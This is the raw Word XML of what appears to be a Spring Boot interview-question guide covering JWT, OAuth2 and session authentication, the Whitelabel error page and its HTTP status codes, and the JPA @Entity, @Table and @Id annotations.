          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C31126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319C422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A29D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7A33B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422001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4BF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72A60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51577131" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="229E56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2F5C82A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RequestFilter jwtRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CB150" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FAF47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68198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Config(JwtTokenUtil jwtTokenUtil, JwtRequestFilter jwtRequestFilter) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C273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52D4223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RequestFilter = jwtRequestFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F31D2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575AF5B" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED5070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7C8B7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00075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122743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07488E1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permitAll()  // Allow authentication endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F7DB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0706B74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7B160C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FilterBefore(jwtRequestFilter, UsernamePasswordAuthenticationFilter.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD996A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5EDB1" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2C9BC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60300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2E1E57A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userDetailsService(userDetailsServiceBean()).passwordEncoder(passwordEncoder());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1476F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55D90" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35834A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8BEE42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1E424BD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70640A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F9DE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8C77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now authenticate by sending a POST request to /api/authenticate with a username and password, and the server will return a JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613802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ubsequent requests, include the JWT token in the Authorization header as Bearer &lt;token&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6A227"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OAuth 2.0 Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45777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Auth 2.0 allows third-party applications to authenticate users and authorize actions without directly managing credentials. Spring Security provides support for OAuth 2.0 login and API authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13157F00"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AB5E5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w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Security OAuth2</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> dependency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2DDE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OAuth provider (Google, Facebook, etc.) in application.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB454E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OAuth2Sso for OAuth2 login or @EnableResourceServer for securing REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2A145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for Google OAuth2 authentication:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5AE8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499F1E5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id=YOUR_GOOGLE_CLIENT_ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785B78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secret=YOUR_GOOGLE_CLIENT_SECRET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6839D7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scope=email,profile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE38F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6CDD50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6EAA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0DA2876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2F312594" w14:textId="77777777" w:rsidR="008E370B" w:rsidRPr="002C6305" w:rsidRDefault="008E370B" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7B75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A5FF8F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DEC0C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2969E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757BE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webjars/**", "/error**").permitAll()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C36D0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7DEDEE4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BD9F7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auth2Login();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB92A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535D8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C90D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ables OAuth2 login with Google and restricts all other endpoints to authenticated users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65199EDB"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ssion Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F0201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also supports session-based authentication using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP session</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This is the default behavior in Spring Boot when using form-based login or basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710BAE6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er creates a session for an authenticated user and stores it on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D968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ssion is identified by a cookie, typically JSESSIONID, which is sent with each subsequent request to maintain authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F4AA69"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403A51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re are multiple ways to authenticate APIs in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18489BF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internal use (use with HTTPS).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349509A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Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A stateless token-based approach that allows for scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A1511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Auth 2.0 Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For integrating with third-party authentication providers like Google, Facebook, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFF8D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 Authentication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Default method using HTTP session management for maintaining state across requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EAB0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hoose the authentication method based on your project’s needs, considering factors like security, user experience, and scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3314C4D3" w14:textId="6558BA54"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742" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36629F" w14:textId="089F72D0" w:rsidR="009653FD" w:rsidRPr="00CE4B95" w:rsidRDefault="009572AF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="678" w:name="_Toc197867892"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In the Spring REST API what is the White label error accessing from the browser? What is the status code you will get</w:t>
      </w:r>
      <w:r w:rsidR="009653FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="678"/>
    </w:p>
    <w:p w14:paraId="4425F204" w14:textId="31CB6DC7" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431"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Whitelabel Error Page"</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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 Causes of the White Label Error Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F76AF7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Mapping Found</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This usually happens when there is no handler method mapped to the URL you're trying to access (e.g., you try to access an endpoint that doesn't exist).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0735E3A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ssing Controller or Method</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a controller or method is missing for the requested URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396BA13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hod Not Allowed</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The HTTP method (GET, POST, etc.) you're trying to use for a particular endpoint might not be allowed (e.g., trying to access a POST endpoint via a GET request).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711568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nal Server Errors</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Issues in the backend logic can also result in this error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5C405B"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371DC8B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ry to access a REST endpoint that doesn't exist or you use an incorrect HTTP method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAAC0CC"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Boot application doesn't have a custom error page configured, so it defaults to the white-label error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB30630"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atus Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28011C22"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this happens, the </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP status code</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you will typically see is </w:t>
      </w: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depending on the issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA0FCC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404 (Not Found)</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is the most common status code when there is no mapping for the URL or when the resource is not found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E0927"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1981F31D"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try to access /api/nonexistent and there is no controller or handler for it, you will get a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>404</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2958602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This occurs if you are trying to use an unsupported HTTP method (like GET for a POST-only endpoint).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6C752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1D65418"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ying to use a GET method on an endpoint that only supports POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76650624"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Handle the White Label Error Page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA982B9"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Custom Error Page</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can customize error pages in Spring Boot to provide more user-friendly responses instead of the white-label error page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08BF8F"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rror.html or error.json page in src/main/resources/templates (for HTML) or src/main/resources/static (for custom JSON error responses).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9AE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a custom error page in error.html:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2890F2F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5BC6385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5E6C1B13"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h1&gt;Error Occurred: ${errorMessage}&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74578DF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gt;Status Code: ${status}&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEDB29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02EA1D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6A73253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Global Exception Handler</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Using @ControllerAdvice to handle exceptions globally can avoid showing the white-label error page and provide a more informative response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6837D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F339AD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59C8BC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04F9CDCD" w14:textId="77777777" w:rsidR="00FD7431" w:rsidRPr="002C6305" w:rsidRDefault="00FD7431" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E58EC5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3470A32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Exception(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602FA9E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Custom Error Message: " + ex.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F96704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95EB18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0CC8DE8"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customizing error handling, you can give users more meaningful error messages rather than the generic white-label page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A989BC0" w14:textId="4A53C39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743" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E060AA8" w14:textId="3C4E70EC" w:rsidR="00091319" w:rsidRPr="00CE4B95" w:rsidRDefault="00091319" w:rsidP="00091319">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="679" w:name="_Toc197867893"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between @Entity, @Table, and @Id in JPA?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="679"/>
    </w:p>
    <w:p w14:paraId="55CD6B83" w14:textId="5A024E98"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PA (Java Persistence API), the annotations @Entity, @Table, and @Id are used to define the mapping between Java classes and database tables. Here's a breakdown of the differences:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A275E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2792F0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Java class as a JPA entity that will be mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1491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509724E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51705F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F12756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22F44F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7683D0"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Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB9D9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Specifies the table in the database that the entity should be mapped to. It is used to customize the name of the table or other table properties like schema and catalog.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9EB0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optional. If not specified, JPA will use the default table name, which is the same as the entity's class name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4A0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861C4D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9C9E5B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517D92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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597800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BC8595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1939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Employee entity will be mapped to the employee_table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C9430E"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1E54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field as the primary key for the entity. Every entity must have a primary key field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA7B5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required for each JPA entity. It specifies which field uniquely identifies each record in the corresponding table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F0B39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5258AB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2C4805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620B740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6C6E37C2" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5DEEC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D9F533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24493569" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2792C6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44D02FEE" w14:textId="77777777" w:rsidR="003620CC" w:rsidRPr="002C6305" w:rsidRDefault="003620CC" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CB910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ther fields, constructors, getters, setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7986C18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BA728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id field is the primary key for the Employee entity, and JPA will use it as the unique identifier for each Employee record in the employee_table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C81E14"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730"/>
        <w:gridCol w:w="5359"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="2091E277" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20369CD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nnotation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A2C9B9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4C59800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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="44EB7DC3" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17A9B9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tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="652F44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rks the class as an entity (a persistent object)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="616D9B4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indicate that the class is mapped to a database table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="26DF5943" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="194482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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="745AA7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es the table name in the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54DC6A1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used to specify the name of the table, schema, and catalog.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="1E8A3060" w14:textId="77777777" w:rsidTr="003620CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="617035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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CD113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the primary key field of the entity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E19CAE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the field that will serve as the primary key for the entity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="366EA3A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conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D88E9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 makes a class persistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187E36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 is optional and used to specify table details (e.g., name).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D08AA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 is used to define the primary key of the entity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EDD50B" w14:textId="1F3954AE"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744" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="623BC305" w14:textId="698293D4" w:rsidR="00FA1FFD" w:rsidRPr="00CE4B95" w:rsidRDefault="00FA1FFD" w:rsidP="00FA1FFD">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="680" w:name="_Toc197867894"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you secure a Spring Boot application?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="680"/>
    </w:p>
